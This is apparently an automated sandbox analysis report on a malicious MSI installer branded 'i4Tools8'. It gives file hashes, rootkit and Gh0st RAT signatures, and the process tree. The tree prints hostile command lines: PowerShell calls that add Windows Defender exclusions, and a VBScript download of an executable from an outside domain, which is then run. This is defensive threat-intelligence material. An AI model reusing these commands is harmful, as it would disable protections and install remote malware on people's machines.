Analysis
  max time kernel: 133s
  max time network: 159s
  platform: windows10-2004_x64
  resource: win10v2004-20240802-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 14/09/2024, 08:11
Static task: static1
Behavioral task: behavioral1
  Sample: zuixinaisi.msi
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: zuixinaisi.msi
  Resource: win10v2004-20240802-en
General
  Target: zuixinaisi.msi
  Size: 233.8MB
  MD5: df0ddca33d18cef60dbfdad992a21ff3
  SHA1: 5db0a225c9713d93412d01c5df5398811e54d1e5
  SHA256: 8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b
  SHA512: e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda
  SSDEEP: 6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD
Malware Config
Signatures
  resource: behavioral2/memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp
  yara_rule: purplefox_rootkit
Gh0st RAT payload (1 IoC)
  resource: behavioral2/memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp
  yara_rule: family_gh0strat
Blocklisted process makes network request (1 IoC)
  flow 31  pid 2808  WScript.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid 4808  powershell.exe
  pid 4564  powershell.exe
Downloads MZ/PE file
Enumerates connected drives (3 TTPs, 64 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by msiexec.exe (44 entries; several drive letters are opened more than once): \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
  File opened (read-only) by instai.exe (20 entries): \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Z:
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  Key value queried  \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation  MSID09F.tmp
  Key value queried  \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation  cmd.exe
Drops file in Windows directory (14 IoCs)
  File opened for modification  C:\Windows\Installer\MSID09F.tmp  msiexec.exe
  File created  C:\Windows\Installer\e58c766.msi  msiexec.exe
  File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSICB0E.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSICC67.tmp  msiexec.exe
  File created  C:\Windows\Installer\inprogressinstallinfo.ipi  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSID06F.tmp  msiexec.exe
  File created  C:\Windows\Installer\e58c762.msi  msiexec.exe
  File created  C:\Windows\Installer\SourceHash{8E2E1E95-E5EE-4019-BB11-82391D9CA4BD}  msiexec.exe
  File opened for modification  C:\Windows\Installer\e58c762.msi  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSICA03.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSIC86C.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSICAA0.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\  msiexec.exe
Executes dropped EXE (2 IoCs)
  pid 4924  MSID09F.tmp
  pid 3484  instai.exe
Loads dropped DLL (5 IoCs)
  pid 112  MsiExec.exe (all 5 entries)
Access Token Manipulation: Create Process with Token (1 TTP, 1 IoC)
  pid 4924  MSID09F.tmp
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Installer Packages (2 TTPs, 1 IoC)
  pid 3040  msiexec.exe
System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by WScript.exe, instai.exe, MsiExec.exe, MSID09F.tmp, cmd.exe, powershell.exe, powershell.exe
Checks SCSI registry key(s) (3 TTPs, 5 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  Set value (data)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache  vssvc.exe
  Set value (data)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  vssvc.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters  vssvc.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr  vssvc.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  instai.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  instai.exe
Modifies data under HKEY_USERS (3 IoCs)
  Key deleted  \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E  msiexec.exe
  Key deleted  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26  msiexec.exe
  Key created  \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27  msiexec.exe
Modifies registry class (24 IoCs)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\InstanceType = "0"  msiexec.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387\59E1E2E8EE5E9104BB112893D1C94ADB  msiexec.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\PackageName = "zuixinaisi.msi"  msiexec.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"  msiexec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Language = "2052"  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"  msiexec.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media  msiexec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Version = "16777216"  msiexec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\DeploymentFlags = "3"  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\ProductName = "i4Tools8"  msiexec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Assignment = "1"  msiexec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AdvertiseFlags = "388"  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\1 = ";"  msiexec.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Clients = 3a0000000000  msiexec.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB  msiexec.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\PackageCode = "D28B5C34E3416EF469BDECBAE57D671B"  msiexec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AuthorizedLUAApp = "0"  msiexec.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\DiskPrompt = "[1]"  msiexec.exe
  Key created  \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings  cmd.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB\MainFeature  msiexec.exe
Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
  HTTP User-Agent header  flow 31  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid 4652  msiexec.exe (2 entries)
  pid 4808  powershell.exe (3 entries)
  pid 4564  powershell.exe (3 entries)
  pid 3484  instai.exe (all remaining entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Distinct privileges per process (repeated entries collapsed):
  3040 msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  4652 msiexec.exe: SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege
  4544 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  4808 powershell.exe: SeDebugPrivilege
Suspicious use of FindShellTrayWindow (2 IoCs)
  pid 3040  msiexec.exe (both entries)
Suspicious use of SetWindowsHookEx (1 IoC)
  pid 3484  instai.exe
Suspicious use of WriteProcessMemory (23 IoCs)
  Distinct writer/target pairs (each appears two or three times in the raw table):
  PID 4652 msiexec.exe wrote to memory of 644 (procid_target 107)
  PID 4652 msiexec.exe wrote to memory of 112 (procid_target 109)
  PID 4652 msiexec.exe wrote to memory of 4924 (procid_target 110)
  PID 4924 MSID09F.tmp wrote to memory of 5048 (procid_target 111)
  PID 5048 cmd.exe wrote to memory of 4808 (procid_target 113)
  PID 5048 cmd.exe wrote to memory of 4564 (procid_target 115)
  PID 5048 cmd.exe wrote to memory of 2808 (procid_target 116)
  PID 5048 cmd.exe wrote to memory of 3484 (procid_target 119)
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (indentation shows the parent/child relationship)
  C:\Windows\system32\msiexec.exe
    Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi
    PID: 3040
    - Enumerates connected drives
    - Event Triggered Execution: Installer Packages
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
  C:\Windows\system32\msiexec.exe
    Command line: C:\Windows\system32\msiexec.exe /V
    PID: 4652
    - Enumerates connected drives
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\srtasks.exe
      Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      PID: 644
    C:\Windows\syswow64\MsiExec.exe
      Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 9781470C31F07C43A7C9ADE697C0B704
      PID: 112
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
    C:\Windows\Installer\MSID09F.tmp
      Command line: "C:\Windows\Installer\MSID09F.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"
      PID: 4924
      - Checks computer location settings
      - Executes dropped EXE
      - Access Token Manipulation: Create Process with Token
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "
        PID: 5048
        - Checks computer location settings
        - System Location Discovery: System Language Discovery
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe
          PID: 4808
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Add-MpPreference -ExclusionPath "C:\ProgramData
          PID: 4564
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
        C:\Windows\SysWOW64\WScript.exe
          Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"
          PID: 2808
          - Blocklisted process makes network request
          - System Location Discovery: System Language Discovery
        C:\ProgramData\instai.exe
          Command line: C:/ProgramData/instai.exe
          PID: 3484
          - Enumerates connected drives
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
  C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    PID: 4544
    - Checks SCSI registry key(s)
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
  Privilege Escalation
    Access Token Manipulation (1): Create Process with Token (1)
    Event Triggered Execution (1): Installer Packages (1)
  Defense Evasion
    Access Token Manipulation (1): Create Process with Token (1)
    System Binary Proxy Execution (1): Msiexec (1)
Downloads